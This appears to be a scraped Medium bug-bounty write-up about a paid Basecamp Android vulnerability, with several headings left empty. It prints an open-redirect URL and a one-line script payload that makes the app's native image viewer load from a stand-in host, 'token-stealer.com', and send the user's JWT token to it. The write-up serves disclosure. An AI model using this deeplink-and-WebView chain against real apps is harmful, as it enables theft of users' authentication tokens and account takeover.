Android security — $6,337 vulnerability in basecamp

Background

The vulnerability

https://3.basecamp.com/5218370/verify?proceed_to=<attacker_website>

What then?

openNativeImageViewer
<script>NativeApp.openNativeImageViewer("[{'download_url': 'https://token-stealer.com/image.jpg', 'preview_url': 'https:/token-stealer.com/image.jpg', 'caption':'ViewImage'}]", 0)</script>
  • Send a deeplink URL to the basecamp app to open
  • The app will open the app, and open the ‘proceed_to’ url inside the WebViewActivity class
  • The WebViewActivity will render the proceed_to html (my stage 1 attack) in a special webview
  • That webview will execute the ‘openNativeImageViewer’ which opens (funny enough) a native image view
  • That image viewer goes to a URL (again controlled by me) and adds that users’s authentication (i.e. jwt) token in the header

Conclusions

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

GAMING AND NFT BY #GAMEJET AND # JET TOKEN.

BurnX 2.0 — Gainers Competition

India makes it to Top 10 in Global Cybersecurity Index 2020

📆Revoland Calendar📆

Request for Proposal

{UPDATE} Highway Racer Hack Free Resources Generator

Aurora FS

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Daniel Llewellyn

Daniel Llewellyn

More from Medium

A Deep dive into <iframe> src=”” attribute leading to a Stored XSS

Port scanning and service discovery in 2022 — we have failed as a humanity

Exploiting Android’s Task Hijacking

[2/3] XSS Through The Front-Door @ GitLab